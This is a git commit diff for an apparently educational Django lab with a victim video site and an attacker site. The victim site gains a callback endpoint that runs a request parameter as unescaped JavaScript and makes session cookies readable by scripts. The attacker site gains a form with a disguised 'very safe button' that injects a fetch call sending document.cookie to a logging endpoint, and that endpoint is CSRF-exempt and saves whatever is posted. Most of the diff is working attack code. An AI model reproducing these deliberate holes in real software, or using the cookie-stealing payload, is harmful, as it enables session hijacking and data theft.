implemented the some vulnerability

TouYube/apps/TouYube/templates/TouYube/callback.html

@@ -0,0 +1,14 @@
+{% extends "TouYube/base/base.html" %}
+{% load static %}
+
+{% block head %}
+    {{ block.super }}
+    <link rel="stylesheet" href="{% static 'TouYube/embed.css' %}" />
+{% endblock %}
+
+{% block body %}
+    <script>
+        {# execute the callback stored #}
+        {{ callback_js | safe }}
+    </script>
+{% endblock %}

TouYube/apps/TouYube/views.py

@@ -135,3 +135,22 @@ def view_video_embed(request: WSGIRequest, video_id: UUID) -> HttpResponse:
         "TouYube/video_embed.html",
         dict(video=video)
     )
+
+
+def view_attack_some(request: WSGIRequest) -> HttpResponse:
+    """
+    Allow for a some attack by allowing JavaScript as an argument that will later be executed in the website context
+    """
+
+    # check the method
+    if request.method != "GET":
+        return HttpResponseBadRequest()
+
+    # get the callback code
+    callback_js = request.GET["callback"]
+
+    return render(
+        request,
+        "TouYube/callback.html",
+        dict(callback_js=callback_js)
+    )

TouYube/configuration/settings.py

@@ -12,8 +12,6 @@ https://docs.djangoproject.com/en/5.0/ref/settings/
 
 from pathlib import Path
 
-from django.views.decorators.csrf import csrf_exempt
-
 # Build paths inside the project like this: BASE_DIR / 'subdir'.
 BASE_DIR = Path(__file__).resolve().parent.parent
 
@@ -144,7 +142,8 @@ DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
 # CORS_ALLOW_ALL_ORIGINS: bool = True
 
 if not ENABLE_CROSS_ORIGIN_SECURITY:
-    X_FRAME_OPTIONS = 'ALLOWALL'
+    X_FRAME_OPTIONS = 'ALLOWALL'  # Allow to integrate the website anywhere
+    SESSION_COOKIE_HTTPONLY = False  # Allow to access cookie in the JavaScript
 
 # Login Settings
-LOGIN_URL: str = "login/"
+LOGIN_URL: str = "/login/"

TouYube/configuration/urls.py

@@ -30,6 +30,9 @@ urlpatterns = [
     path('video/view/<uuid:video_id>/', apps.TouYube.views.view_video_full, name="video_full"),
     path('video/embed/<uuid:video_id>/', apps.TouYube.views.view_video_embed, name="video_embed"),
 
+    # TODO(Faraphel): find a better path and names for an example
+    path('callback/', apps.TouYube.views.view_attack_some, name="callback_attack_some"),
+
     path('admin/', admin.site.urls),
 ]
 

Witter/.gitignore

@@ -1,3 +1,5 @@
 # Django
 db.sqlite3
 
+# Application
+.logs/

Witter/apps/Witter/templates/Witter/csrf.html

@@ -2,7 +2,7 @@
 
 {% block title %}{{ block.super }} - Homepage{% endblock %}
 {% block body %}
-    <h1>Homepage</h1>
+    <h1>CRSF</h1>
 
     <label>My favorite video's ID that I made: <input id="favorite-video-url" type="text" style="width: 32ch;"/></label>
 

Witter/apps/Witter/templates/Witter/some.html

@@ -0,0 +1,26 @@
+{% extends "Witter/base/base.html" %}
+
+{% block title %}{{ block.super }} - Homepage{% endblock %}
+{% block body %}
+    <h1>SOME</h1>
+
+    <form id="attack-form" action="http://localhost:8080/callback/" method="GET">
+        <input type="hidden" name="callback" value="
+            fetch('http://localhost:8081/logs/', {
+                method: 'POST',
+                body: JSON.stringify({
+                    cookie: document.cookie
+                }),
+                headers: {
+                    'Content-type': 'application/json; charset=UTF-8'
+                }
+            })
+        ">
+
+        <input type="submit" value="I am a very safe button that will not obtain your cookies 😊">
+    </form>
+    
+    <script>
+        
+    </script>
+{% endblock %}

Witter/apps/Witter/views.py

@@ -1,12 +1,55 @@
+import json
+from datetime import datetime
+
 from django.core.handlers.wsgi import WSGIRequest
-from django.http import HttpResponse
+from django.http import HttpResponse, HttpResponse
 from django.shortcuts import render
+from django.views.decorators.csrf import csrf_exempt
 
-from apps.Witter import forms, models
+from configuration.settings import BASE_DIR
 
 
-def view_homepage(request: WSGIRequest) -> HttpResponse:
+# create the logging directory for the attacks
+LOG_DIRECTORY = BASE_DIR / ".logs"
+LOG_DIRECTORY.mkdir(exist_ok=True)
+
+LOG_SOME_DIRECTORY = LOG_DIRECTORY / "some"
+LOG_SOME_DIRECTORY.mkdir(exist_ok=True)
+
+
+def view_csrf(request: WSGIRequest) -> HttpResponse:
+    """
+    CSRF attack page
+    """
+
     return render(
         request,
-        "Witter/homepage.html",
+        "Witter/csrf.html",
     )
+
+
+def view_some(request: WSGIRequest) -> HttpResponse:
+    """
+    SOME attack page
+    """
+
+    return render(
+        request,
+        "Witter/some.html",
+    )
+
+
+@csrf_exempt
+def view_logger(request: WSGIRequest) -> HttpResponse:
+    """
+    Log all the information about a POST request
+    """
+
+    # get the path of the file were to log the information
+    log_path = LOG_SOME_DIRECTORY / datetime.now().strftime("%Y-%m-%d %H-%M-%S.req")
+    # log the request
+    with log_path.open("w", encoding="utf-8") as log_file:
+        # dump all the data in the file
+        print(f"Body: {request.body}", file=log_file)
+
+    return HttpResponse()

Witter/configuration/settings.py

@@ -127,3 +127,8 @@ STATIC_ROOT = ".static"
 # https://docs.djangoproject.com/en/5.0/ref/settings/#default-auto-field
 
 DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
+
+
+# CORS Settings
+
+CORS_ALLOW_ALL_ORIGINS: bool = True

Witter/configuration/urls.py

@@ -22,7 +22,10 @@ import apps.Witter.views
 from configuration import settings
 
 urlpatterns = [
-    path('', apps.Witter.views.view_homepage, name="homepage"),
+    path('csrf/', apps.Witter.views.view_csrf, name="attack_csrf"),
+    path('some/', apps.Witter.views.view_some, name="attack_some"),
+
+    path('logs/', apps.Witter.views.view_logger, name="logger"),
 
     path('admin/', admin.site.urls),
 ]